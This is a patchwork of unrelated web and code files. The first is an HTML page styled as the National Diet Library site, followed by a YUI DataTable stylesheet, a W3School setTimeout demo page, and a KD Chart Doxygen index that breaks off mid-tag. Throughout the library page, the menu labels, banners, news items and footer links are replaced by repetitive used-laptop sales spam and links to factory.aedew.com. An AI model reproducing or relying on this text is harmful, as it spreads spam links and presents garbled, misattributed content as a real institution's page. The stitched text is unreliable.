Excel )搭載】 富士通 FMV-A6290 Core2Duo-2.53Ghz メモリ2GB HDD80GB DVDROM MS Office (P58of) 3ヵ月保証 中古 ノートパソコン 送料無料 【中古】リフレッシュPC リサイクルPC" width="141" height="40" class="changeImage" /></a></li> <li><a href="https://ndlopac.ndl.go.jp/"><img src="http://ndl.go.jp/common/images/menu2-03_off.jpg" alt="蔵書検索" width="128" height="40" class="changeImage" /></a></li> <li><a href=""><img src="http://ndl.go.jp/common/images/menu2-04_off.jpg" alt="【即納】TOSHIBA(東芝) DVDマルチ Dynabook G9/X24PDCWT 768MB 大画面 無線LAN Blue Tooth 3ヶ月保証(K32)【中古パソコン】【PC家電_066P2】" width="128" height="40" class="changeImage" /></a></li> <li><a href="http://ndl.go.jp/service/online_service.html#shirabekata"><img src="http://ndl.go.jp/common/images/menu2-05_off.jpg" alt="中古パソコン 中古ノートパソコン 【 Microsoft Office ( Word Excel )搭載】 【Windows XP】 東芝 Dynabook Satellite K17 CeleronM1.86Ghz メモリ2GB HDD60GB DVDコンボ (L63zxof) 3ヵ月保証 ノートパソコン 【中古】" width="128" height="40" class="changeImage" /></a></li> <li><a href=""><img src="http://ndl.go.jp/common/images/menu2-06_off.jpg" alt="【即納】【外観訳ありの為、値下げ!!送料無料!!】富士通(FUJITSU) DVDコンボ搭載 FMV-820NUB C-2.4G メモリ512MB KingsoftOffice2010付属 3ヶ月保証(K97dw3)【中古パソコン】【中古】!" width="128" height="40" class="changeImage" /></a></li> </ul> </div> </div> <!-- gNavi // --> <div id="contentsbody"> <!-- // contents_l --> <div id="contents_l"> <div class="contents_search_con"> <h2><a href="http://iss.ndl.go.jp/"><img src="http://ndl.go.jp/common/images/title_ndl-opac.jpg" alt="中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! " width="230" height="40" class="changeImage" /></a></h2> <form id="siteSearch_top" name="siteSearch_top" class="contents_search_bt clearAfter" action="javascript:getNdlsearch_top('ja','other');"> <label for="ndlsearchbox_top" class="hidden">検索文字入力</label> <input id="ndlsearchbox_top" type="text" class="contents_searchKeyword" value="キーワードを入力" /> <input type="image" class="changeImage" id="submit_top" value="検索" src="http://ndl.go.jp/common/images/bt_search-b2_off.gif" alt="検索" /> </form> <p>【即納】初心者セット?+PCソフトなび(学習CD)★富士通(FUJITSU) FMV-820NA【入門BOOK?USBメモリ(4G)?マウス?電子説明書付】DVDマルチ(DVDもCDも、再生?コピーOK★) 高性能P4 Office 3ヵ月保証(L87mpc)【中古パソコン】【中古】</p> </div> <div class="Information"> <h2>【即納】 送料無料 【★マイクロソフトオフィス(Word?Excel)付セット★】富士通 ESPRIMO FMV D5120 17インチ液晶モニター付★ Sempron 3000+ 新品マウス?新品キーボード付★ 3ヶ月保証(Z58L17of)【中古デスクトップパソコン】【中古】!</h2> <ul> <li><a href="http://factory.aedew.com/images/Core2Duo/020411051g57pq.html">http://factory.aedew.com/images/Core2Duo/020411051g57pq.html</a></li> <li><a href="">【即納】TOSHIBA(東芝) DVDマルチ搭載 Dynabook Satellite J61 C/M 大画面 Office 3ヶ月保証(J70)【中古パソコン】【中古】!</a></li> <li><a href="http://ndl.go.jp/aboutus/deposit/deposit.html" onclick="javascript:urchinTracker('/side/nouhon.html');">中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </a> / <a href="" onclick="javascript:urchinTracker('/side/jnb.html');">中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </a></li> <li><a href="http://factory.aedew.com/images/Core2Duo/020410577s48er.html">http://factory.aedew.com/images/Core2Duo/020410577s48er.html</a></li> <li><a href="http://ndl.go.jp/service/rssemag.html#RSS" onclick="javascript:urchinTracker('/side/rss.html');">RSS</a> / <a href="http://ndl.go.jp/service/rssemag.html#MM" onclick="javascript:urchinTracker('/side/mm.html');">メルマガ</a> / <a href="http://ndl.go.jp//service/rssemag.html#API" onclick="javascript:urchinTracker('/side/api.html');">API</a> / <a href="http://ndl.go.jp//service/rssemag.html#Twitter" onclick="javascript:urchinTracker('/side/twitter.html');">Twitter</a></li> </ul> </div><div class="contents_banner"><a href=""><img src="http://ndl.go.jp/common/images/banner_archive.png" alt="中古パソコン NEC VersaPro VY21G/W-5 Windows7 Core2Duo T8100-2.1Ghz メモリ4GB HDD80GB DVDROM MS Office (P24-7) 3ヵ月保証 中古 ノートパソコン 送料無料 【中古】" width="230" height="40" /></a></div> <div class="contents_banner"><a href=""><img src="http://ndl.go.jp/common/images/banner_kaigiroku.gif" alt="中古パソコン 【 Microsoft Office ( Word Excel )搭載】 DELL Vostro230 Windows7 Pentium E5400-2.7Ghz メモリ2GB HDD320GB DVDマルチ [17インチ液晶] (R21mL17of) 3ヵ月保証 中古デスクトップ 送料無料 【中古】リフレッシュPC リサイクルPC" width="230" height="40" /></a></div> <div class="contents_banner"><a href=""><img src="http://ndl.go.jp/common/images/banner_ndl_opac.gif" alt="中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! " width="230" height="40" /></a></div> <div class="contents_banner"><a href=""><img src="http://ndl.go.jp/common/images/banner_digi.gif" alt="中古パソコン 17インチ液晶付 NEC MY21A/E-3 Core2Duo-2.13Ghz メモリ2GB HDD320GB DVDマルチ Office (R03mL17) 3ヵ月保証 中古 デスクトップ 送料無料 【中古】" width="230" height="40" /></a></div> <div class="contents_banner"><a href=""><img src="http://ndl.go.jp/common/images/banner_kindai.gif" alt="【訳ありの為価格見直し商品】中古パソコン Windows7 Professional 富士通 LIFEBOOK A550/A Core i5 520M-2.4Ghz メモリ2GB HDD160GB 15.6ワイド液晶 DVDマルチ Office 3ヵ月保証 (P74mw) 中古ノートパソコン 送料無料 【中古】リフレッシュPC" width="230" height="40" /></a></div> <div class="contents_banner"><a href=""><img src="http://ndl.go.jp/common/images/banner_research.gif" alt="リサーチ・ナビ" width="230" height="40" /></a></div> <div class="contents_banner"><a href=""><img src="http://ndl.go.jp/common/images/banner_reference.gif" alt="中古パソコン 【無線LAN内臓】 NEC Versapro VY17M/ED-1 CeleronM-1.73Ghz メモリ1GB HDD80GB DVDマルチ ワイド液晶 Office (P34z-7Wi) 3ヵ月保証 中古 ノートパソコン 送料無料 【中古】" width="230" height="40" /></a></div> <div class="contents_banner"><a href=""><img src="http://ndl.go.jp/common/images/banner_hourei.gif" alt="日本法令索引" width="230" height="40" /></a></div> <div class="contents_banner"><a href=""><img src="http://ndl.go.jp/common/images/bnr_kids.jpg" alt="【即納】 送料無料 初心者セット?+年中無休!!24時までOK!!の電話サポート付きセット★富士通 FMV-C8220【入門BOOK?USBメモリ(8G)?マウス?電子説明書付】DVDコンボ(DVD再生とCDのコピー再生ok)★ Office 3ヶ月保証(P06zre)【中古】" width="220" height="44" /></a></div> <div class="contents_banner_big"><a href=""><img src="http://ndl.go.jp/common/images/banner_ca.gif" alt="中古パソコン 【訳あり】 富士通 FMV-A6290 Windows7 Celeron900-2.2Ghz メモリ1GB HDD80GB DVDROM (P58zw) 3ヵ月保証 中古ノートパソコン 送料無料 【中古】リフレッシュPC リサイクルPC" width="230" height="40" /></a></div> <hr /><br /> <div class="contents_banner"><a href="" onclick="javascript:urchinTracker('/banner/jikocho.html');"><img src="http://ndl.go.jp/common/images/banner_jikocho.gif" alt="【即納】TOSHIBA(東芝) オールインワン Dynabook SatelliteJ30 512MB(増設) P/M-1.4G リカバリ内蔵 大画面 Office2010付属(J53)【中古パソコン】【中古】!" width="230" height="40" /></a></div> </div> <!-- contents_l // --> <!-- // contents_c --> <div id="contents_c"> <div class="emergency clearAfter"> <div class="emergency_tit2"> <h2>中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! ,中古パソコン HP dc5700 Core2Duo メモリ2GB DVDコンボ office 3ヶ月保証(Z34b) 中古デスクトップ【中古】送料無料</h2> </div> <div class="emergency_con"> <a href="">【即納】 送料無料 初心者セット+PCソフトなび(学習CD)★東芝 Satellite J61【入門BOOK?USBメモリ(8G)?マウス?電子説明書付】CoreDuo HDD:【新品】320G 3ヶ月保証(K99bpc)中古パソコン 中古 ノートパソコン 【中古】!05P22Nov12</a> </div> </div> <div class="news clearAfter"> <div class="news_tit"> <h2>中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </h2> <p><a class="icon" href="">【即納】【マイクロソフトオフィス付】 送料無料 TOSHIBA(東芝) Satellite J62 無線LAN搭載 HDD:【新品】500G 高性能CoreDuo さくさくメモリ2GB DVDコンボ 3ヶ月保証(K99aWiof) 中古パソコン 中古 ノートパソコン 【中古】!【SBZcou1208】</a><a href="http://ndl.go.jp//rss/update.xml"><img src="http://ndl.go.jp/common/images/ico_rss.gif" alt="rss" width="14" height="16" /></a></p> </div> <ul class="news_bt clearAfter"> <li><a href=""><img src="http://ndl.go.jp/common/images/bt_press_off.gif" alt="【即納】 送料無料 【★マイクロソフトオフィス(Word?Excel)付セット★】TOSHIBA(東芝) Satellite J60 高性能CoreSolo★ メモリ1G★ DVDコンボ搭載★ 3ヶ月保証(K99zof) 中古パソコン 中古 ノートパソコン 【中古】!【2sp_121105_green】" width="86" height="40" class="changeImage" /></a></li> <li><a href=""><img src="http://ndl.go.jp/common/images/bt_news_off.gif" alt="【即納】日立 HITACHI FLORA330W 17インチ液晶付 新品マウス?新品キーボード付★ DVDコンボ(DVD再生とCDのコピー再生ok) CeleronD-2.8Ghz搭載 3ヶ月保証(Z03dL17)【中古デスクトップパソコン】【中古】!" width="85" height="40" class="changeImage" /></a></li> <li><a href=""><img src="http://ndl.go.jp/common/images/bt_event_off.gif" alt="【即納】【値下げしました!】 送料無料 【グラボ搭載オンラインゲーム対応PC】【2008年発表モデル】富士通 FMV ESPRIMO D5350 高性能Core2Duo-3Ghz メモリ2G(MAX) 3ヶ月保証(Z68L17)【中古デスクトップパソコン】【中古】!" width="85" height="40" class="changeImage" /></a></li> <li><a href=""><img src="http://ndl.go.jp/common/images/bt_issue_off.gif" alt="中古パソコン 【 Microsoft Office ( Word Excel )搭載】 [Windows XP] DELL Optiplex755 USFF Core2Duo-2.2Ghz メモリ1GB HDD80GB DVDROM Office [本体のみ] (R24xof) 3ヵ月保証 中古デスクトップパソコン 送料無料 【中古】" width="85" height="40" class="changeImage" /></a></li> <li class="end"><a href=""><img src="http://ndl.go.jp/common/images/bt_recruit_off.gif" alt="【即納】TOSHIBA(東芝) Satellite1860 DVDマルチ搭載 高性能P4 大画面 512MB Office2010付 3ヶ月保証(L34m)【中古パソコン】【中古】送料全国一律1,200円!" width="85" height="40" class="changeImage" /></a></li> </ul> <div class="news_con"> <dl> <dt><span>2015年12月24日</span>&nbsp;<img src="http://ndl.go.jp/common/images/ico_issue.gif" alt="刊行物" width="68" height="16" /></dt> <dd><a href="" >中古パソコン 【即納】【Windows7搭載】 無線LAN内蔵 富士通(FUJITSU) FMV-A8270 Core2Duo-2.26G メモリ2G 【新品HDD:500G】 3ヶ月保証(P47-7Wi) 中古 ノートパソコン 【2008年発表モデル】送料無料 【中古】,中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </a></dd> <dt><span>2015年12月17日</span>&nbsp;<img src="http://ndl.go.jp/common/images/ico_issue.gif" alt="刊行物" width="68" height="16" /></dt> <dd><a href="http://factory.aedew.com/images/Core2Duo/020410370j29nx.html">http://factory.aedew.com/images/Core2Duo/020410370j29nx.html</a></dd> <dt><span>2015年12月7日</span>&nbsp;<img src="http://ndl.go.jp/common/images/ico_etc.gif" alt="その他" width="68" height="16" /></dt> <dd><a href="" >中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </a></dd> <dt><span>2015年12月7日</span>&nbsp;<img src="http://ndl.go.jp/common/images/ico_issue.gif" alt="刊行物" width="68" height="16" /></dt> <dd><a href="http://factory.aedew.com/images/Core2Duo/020411331k69lx.html">http://factory.aedew.com/images/Core2Duo/020411331k69lx.html</a></dd> <dt><span>2015年12月3日</span>&nbsp;<img src="http://ndl.go.jp/common/images/ico_etc.gif" alt="その他" width="68" height="16" /></dt> <dd><a href="" >中古パソコン 取扱説明書付 【17インチ液晶付】【マイクロソフトオフィス付】 富士通 FUJITSU FMV-D5260 WindowsXP Pro MS office 3ヶ月保証(Z79zL17of) 中古 デスクトップ 【中古】送料無料,中古パソコン 【 Microsoft Office ( Word Excel )搭載】 Windows7 HP dc5800 Core2Duo メモリ2GB HDD:80GB Office 3ヶ月保証 (Z74-7of) 【中古】 中古 パソコン 送料無料</dd> <dt><span>2015年12月3日</span>&nbsp;<img src="http://ndl.go.jp/common/images/ico_recruit.gif" alt="採用情報" width="68" height="16" /></dt> <dd><a href="http://factory.aedew.com/images/Core2Duo/020410327a12bj.html">http://factory.aedew.com/images/Core2Duo/020410327a12bj.html</a></dd> </dl> </div> </div> <div class="spotlight"> <div class="spotlight_tit"> <h2>中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </h2> </div> <div class="spotlight_con"> <dl class="clearAfter"> <dt><a href=""><img src="http://ndl.go.jp/jp/spot/__icsFiles/thumbnail/2015/11/30/spot_sympo1601.jpg" alt="中古パソコン 【即納】【マイクロソフトオフィス付】【2008年発表モデル】富士通(FUJITSU) FMV-A6270 15.4インチワイド液晶 Office 3ヶ月保証(P55of) 中古 ノートパソコン 送料無料 !【中古】" /></a></dt> <dd> <a href="">中古パソコン NEC VersaPro VY16M/W-4 無線LAN内臓 Windows7 CeleronM-1.6Ghz メモリ1GB HDD80GB DVDコンボ FDD Office (P26-7Wi) 3ヵ月保証 中古 ノートパソコン 送料無料 【中古】</a> <span>【即納】TOSHIBA(東芝) DVDマルチ搭載 Dynabook Satellite J61 1GB 大画面 リカバリ内蔵 Office2010付属 3ヶ月保証(J70s)【中古ノートパソコン】,中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </span> </dd> </dl> <dl class="clearAfter"> <dt><a href="http://ndl.go.jp/kaleido/entry/20/index.html"><img src="http://ndl.go.jp/jp/spot/__icsFiles/thumbnail/2015/11/18/spot_kaleido20.jpg" alt="中古パソコン 【 Microsoft Office ( Word Excel )搭載】 NEC Express 5800/51Le Core2Duo-2.13Ghz メモリ3GB HDD160GB DVDマルチ MS Office (R02of) 3ヵ月保証 中古 デスクトップ 送料無料 【中古】" /></a></dt> <dd> <a href="">中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </a> <span>中古ノートパソコン マルチドライブ搭載!見易い15.6HDモニターで使易い!無線LAN内蔵 【Core i3-370M/2GB/160G/MULTI/15.6TFT】 富士通 LIFEBOOK A550/B Windows7Pro 64Bit A4ワイド 中古パソコン【中古】 リフレッシュPC リサイクルPC,中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </span> </dd> </dl> </div> </div> </div> <div class="event"> <h2>中古ノートパソコン メモリー2GB☆ワイドTFT?Windows7 Pro 32bit? 【Core2Duo P8700/2GB/160GB/MULTI/15.4TFT】 NEC VersaProPC-VY25A/A-9 銀パソ VA-9 中古ノートパソコン 【中古】 リフレッシュPC リサイクルPC,中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </h2> <dl><dt>2016年1月11日(月)</dt> <dd><a href="">中古ノートパソコン 激スペック!第3世代Core i7搭載?メモリー4GB?フルテンキー搭載! 東芝 dynabook B552 【Core i7-3520M/4GB/320GB/MULTI】 ビジネスPC Windows7 Pro 64Bit 中古ノートパソコン 無線LAN WLAN ノートパソコン 【中古】 リサイクルPC 中古ノートパソコン,中古ノートパソコン カスタマイズ自由!高性能ノートをベースに用途に合わせてオーダー可能!【Core i3 M360/~4GB/~1TB/~MULTI】店長におまかせノート Windows8も選択可能☆ ノートパソコン 【中古】 リサイクルPC 中古ノートパソコン,中古ノートパソコン 使易い13.3インチワイド☆Core i5!マルチ!メモリー4GB☆ 富士通 S560/B 【Core i5 560M/4GB/160G/MULTI/13.3W】 LIFEBOOK 無線LAN付 Windows7 Pro 32Bit版 A4ワイド 中古ノートパソコン 【中古】 リフレッシュPC リサイクルPC</a></dd> <dt>2016年1月15日(金)</dt> <dd><a href="http://factory.aedew.com/images/Core2Duo/020411520x42eh.html">http://factory.aedew.com/images/Core2Duo/020411520x42eh.html</a></dd> <dt>2016年2月18日(木)</dt> <dd><a href="http://factory.aedew.com/images/Core2Duo/020411493z81sv.html">http://factory.aedew.com/images/Core2Duo/020411493z81sv.html</a></dd> </dl> </div> </div> <!-- contents_r // --> </div> <!-- // footer --> <div id="footer" class="clearAfter"> <!-- // hidden --> <span class="hidden">ここからサブメニュー(フッタ)です。</span> <!-- hidden // --> <div class="footer_in2"> <!-- // about --> <p id="about"><a href="">中古ノートパソコン 第2世代 Core i7 搭載!フルテンキーに大画面モニター!メモリー4GB☆ DELL Latitude E6520 【Core i7 2620M/4GB/500GB/MULTI/15.6TFT HD+】無線LAN付 Windows7 Pro 64Bit 中古 ノートパソコン 【中古】 リサイクルPC 中古ノートパソコン</a></p> <!-- about // --> <!-- // footernavi --> <div id="footernavi"> <ul> <li><a href="http://ndl.go.jp/aboutus/index.html">中古パソコン 高性能Core i3搭載☆マルチドライブ搭載☆ 【Core i3-550/2GB/160G/MULTI】富士通 ESPRIMO D750/A マルチ搭載 Windows7 Pro 32bit 中古デスクトップ 【中古】 リフレッシュPC リサイクルPC</a></li> <li><a href="http://ndl.go.jp/aboutus/deposit/deposit.html">納本制度</a></li> <li><a href="http://ndl.go.jp/library/index.html">中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </a></li> <li><a href="">出版者の方へ</a></li> <li><a href="">障害のある方へ</a></li> <li><a href="">中古ノートパソコン 第2世代Core i5搭載!複数ソフト起動も軽快! 富士通 LIFEBOOK A561 【Core i5-2520M/4GB/160G/MULTI】 店長オススメ Windows7 Pro 64Bit 中古パソコン 【中古】 リフレッシュPC リサイクルPC HDMI 中古ノートパソコン</a></li> <li><a href="http://ndl.go.jp/publication/index.html">刊行物</a></li> <li><a href="">中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコン Gateway W340UA /AMD Sempron 3200+ 1.6GHz/PC2-5300 2GB/HDD 40GB/DVDマルチドライブ/WindowsXP Home Edition導入済み/OFFICE2013付き! </a></li> <li class="end"><a href="http://ndl.go.jp//supply/index.html">調達情報</a></li> </ul> </div> <!-- footernavi // --> <div id="footernavi2" class="clearAfter"> <ul> <li><a href="">サイトポリシー</a></li> <li class="end"><a href="">お問い合わせ</a></li> </ul> </div> </div> <div class="copyright" xml:lang="en" lang="en">Copyright &copy; 2012- All Rights Reserved.</div> </div> <!-- footer // --> </div> </body> </html>
wp-includes/js/yui/2.5.0/build/datatable/assets/datatable.css
alx/blogsfera
/* Copyright (c) 2008, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo.net/yui/license.txt version: 2.5.0 */ /*foundational css*/ .yui-dt-table th, .yui-dt-table td { overflow:hidden; } th .yui-dt-header { position:relative; } th .yui-dt-label { position:relative; border-right:10px; } th .yui-dt-resizer { position:absolute; margin-right:-6px; right:0; bottom:0; width:6px; height:100%; cursor:w-resize; cursor:col-resize; } /* foundational scrolling css */ .yui-dt-scrollable { *overflow-y:auto; /* for ie */ } .yui-dt-scrollable thead { display:block; /* for safari and opera */ } .yui-dt-scrollable thead tr { position:relative; /* for ie */ } .yui-dt-scrollbody { display:block; /* for safari and opera */ overflow:auto; /* for gecko */ } .yui-dt-editor { position:absolute; }
Coding/W3School/W3CN/www.w3school.com.cn/tiy/ta25f.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="zh-cn"> <!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=hdom_timing2 by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 00:59:08 GMT --> <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack --> <head> <meta charset="utf-8" /> <meta name="robots" content="all" /> <meta name="author" content="w3school.com.cn" /> <link rel="stylesheet" type="text/css" href="tc.css" /> <title>W3School在线测试工具 V2</title> </head> <body id="editor"> <div id="wrapper"> <div id="header"> <h1>W3School TIY</h1> <div id="ad"> <script type="text/javascript"><!-- google_ad_client = "pub-3381531532877742"; /* 728x90, tiy_big */ google_ad_slot = "7947784850"; google_ad_width = 728; google_ad_height = 90; //--> </script> <script type="text/javascript" src="../../pagead2.googlesyndication.com/pagead/f.txt"> </script> </div> </div> <form action="http://www.w3school.com.cn/tiy/v.asp" method="post" id="tryitform" name="tryitform" onSubmit="validateForm();" target="i"> <div id="butt"> <input type="button" value="提交代码" onClick="submitTryit()"> </div> <div id="CodeArea"> <h2>编辑您的代码:</h2> <textarea id="TestCode" wrap="logical"> <html> <head> <script type="text/javascript"> function timedText() { var t1=setTimeout("document.getElementById('txt').value='2 seconds!'",2000) var t2=setTimeout("document.getElementById('txt').value='4 seconds!'",4000) var t3=setTimeout("document.getElementById('txt').value='6 seconds!'",6000) } </script> </head> <body> <form> <input type="button" value="显示计时的文本!" onClick="timedText()"> <input type="text" id="txt"> </form> <p>在按钮上面点击。输入框会显示出已经流逝的 2、4、6 秒钟。</p> </body> <!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=hdom_timing2 by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 00:59:08 GMT --> </html> </textarea> </div> <input type="hidden" id="code" name="code" /> <input type="hidden" id="bt" name="bt" /> </form> <div id="result"> <h2>查看结果:</h2> <iframe frameborder="0" name="i" src="loadtexta25f.html?f=hdom_timing2"></iframe> </div> <div id="footer"> <p>请在上面的文本框中编辑您的代码,然后单击提交按钮测试结果。<a href="../index-2.html" title="W3School 在线教程">w3school.com.cn</a></p> </div> </div> <script type="text/javascript"> function submitTryit() { var t=document.getElementById("TestCode").value; t=t.replace(/=/gi,"w3equalsign"); t=t.replace(/script/gi,"w3scrw3ipttag"); document.getElementById("code").value=t; document.getElementById("tryitform").action="v.html"; validateForm(); document.getElementById("tryitform").submit(); } function validateForm() { var code=document.getElementById("code").value; if (code.length>5000) { document.getElementById("code").value="<h1>Error</h1>"; } } </script> </body> </html>
kchart/kdchart/doc/refman/functions_func_0x69.html
JeremiasE/KFormula
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1"> <title>KD Chart 2: Class Members - Functions</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" type="text/css"> </head><body> <!-- Generated by Doxygen 1.5.1 --> <div class="tabs"> <ul> <li><a href="index.html"><span>Main&nbsp;Page</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li id="current"><a href="classes.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li><a href="dirs.html"><span>Directories</span></a></li> <li><a href="pages.html"><span>Related&nbsp;Pages</span></a></li> </ul></div> <div class="tabs"> <ul> <li><a href="classes.html"><span>Alphabetical&nbsp;List</span></a></li> <li><a href="annotated.html"><span>Class&nbsp;List</span></a></li> <li><a href="hierarchy.html"><span>Class&nbsp;Hierarchy</span></a></li> <li id="current"><a href="functions.html"><span>Class&nbsp;Members</span></a></li> </ul></div> <div class="tabs"> <ul> <li><a href="functions.html"><span>All</span></a></li> <li id="current"><a href="functions_func.html"><span>Functions</span></a></li> <li><a href="functions_vars.html"><span>Variables</span></a></li> <li><a href="functions_type.html"><span>Typedefs</span></a></li> <li><a href="functions_enum.html"><span>Enumerations</span></a></li> <li><a href="functions_eval.html"><span>Enumerator</span></a></li> <li><a href="functions_prop.html"><span>Properties</span></a></li> </ul> </div> <div class="tabs"> <ul> <li><a href="functions_func.html#index_a"><span>a</span></a></li> <li><a href="functions_func_0x62.html#index_b"><span>b</span></a></li> <li><a href="functions_func_0x63.html#index_c"><span>c</span></a></li> <li><a href="functions_func_0x64.html#index_d"><span>d</span></a></li> <li><a href="functions_func_0x65.html#index_e"><span>e</span></a></li> <li><a href="functions_func_0x66.html#index_f"><span>f</span></a></li> <li><a href="functions_func_0x67.html#index_g"><span>g</span></a></li> <li><a href="functions_func_0x68.html#index_h"><span>h</span></a></li> <li id="current"><a href="functions_func_0x69.html#index_i"><span>i</span></a></li> <li><a href="functions_func_0x6b.html#index_k"><span>k</span></a></li> <li><a href="functions_func_0x6c.html#index_l"><span>l</span></a></li> <li><a href="functions_func_0x6d.html#index_m"><span>m</span></a></li> <li><a href="functions_func_0x6e.html#index_n"><span>n</span></a></li> <li><a href="functions_func_0x6f.html#index_o"><span>o</span></a></li> <li><a href="functions_func_0x70.html#index_p"><span>p</span></a></li> <li><a href="functions_func_0x72.html#index_r"><span>r</span></a></li> <li><a href="functions_func_0x73.html#index_s"><span>s</span></a></li> <li><a href="functions_func_0x74.html#index_t"><span>t</span></a></li> <li><a href="functions_func_0x75.html#index_u"><span>u</span></a></li> <li><a href="functions_func_0x76.html#index_v"><span>v</span></a></li> <li><a href="functions_func_0x77.html#index_w"><span>w</span></a></li> <li><a href="functions_func_0x7a.html#index_z"><span>z</span></a></li> <li><a href="functions_func_0x7e.html#index_~"><span>~</span></a></li> </ul> </div> <p> &nbsp; <p> <h3><a class="anchor" name="index_i">- i -</a></h3><ul> <li>index() : <a class="el" href="class_k_d_chart_1_1_abstract_proxy_model.html#b481e34906669ef6bbd433736ef98671">KDChart::AbstractProxyModel</a> , <a class="el" href="class_k_d_chart_1_1_dataset_proxy_model.html#f424d678f7e1615d630e80108f750e16">KDChart::DatasetProxyModel</a> , <a class="el" href="class_k_d_chart_1_1_abstract_proxy_model.html#b481e34906669ef6bbd433736ef98671">KDChart::AbstractProxyModel</a> <li>indexAt() : <a class="el" href="class_k_d_chart_1_1_abstract_diagram.html#71824fb6bd5a9da9c35b63a712ab8ca1">KDChart::AbstractDiagram</a> <li>indexesAt() : <a class="el" href="class_k_d_chart_1_1_abstract_diagram.html#51f1b261b21a9a604245ba51e4da5a6a">KDChart::AbstractDiagram</a> , <a class="el" href="class_k_d_chart_1_1_reverse_mapper.html#cde229a3e261ddee101dec1fa5947eca">KDChart::ReverseMapper</a> , <a class="el" href="class_k_d_chart_1_1_abstract_diagram.html#51f1b261b21a9a604245ba51e4da5a6a">KDChart::AbstractDiagram</a> <li>indexesIn() : <a class="el" href="class_k_d_chart_1_1_reverse_mapper.html#87faa2e6f595d45d5ae8903902a88d09">KDChart::ReverseMapper</a> <li>initFrom() : <a class="el" href="class_k_d_chart_1_1_attributes_model.html#ea6a706f8ea38d97fcab29f4747dc923">KDChart::AttributesModel</a> <li>innerRect() : <a class="el" href="class_k_d_chart_1_1_abstract_area_base.html#be15ba5df6050a3ff8eea66c41953efd">KDChart::AbstractAreaBase</a> <li>instance() : <a class="el" href="class_k_d_chart_1_1_global_measure_scaling.html#57a46a6f90b1a54f61a990ddbcc24958">KDChart::GlobalMeasureScaling</a> <li>intersects() : <a class="el" href="class_k_d_chart_1_1_text_layout_item.html#46b8eae6fa820e1d82808fc589db267f">KDChart::TextLayoutItem</a> <li>invalidate() : <a class="el" href="class_prerendered_label.html#69318192da8c0fa4552ad0a6e6dce72a">PrerenderedLabel</a> , <a class="el" href="class_prerendered_element.html#ce9556a919d9d7a9caaddc9c9a43e5b5">PrerenderedElement</a> <li>isAbscissa() : <a class="el" href="class_k_d_chart_1_1_cartesian_axis.html#ac6fbdb203a89cc504758f92429a995a">KDChart::CartesianAxis</a> <li>isCorner() : <a class="el" 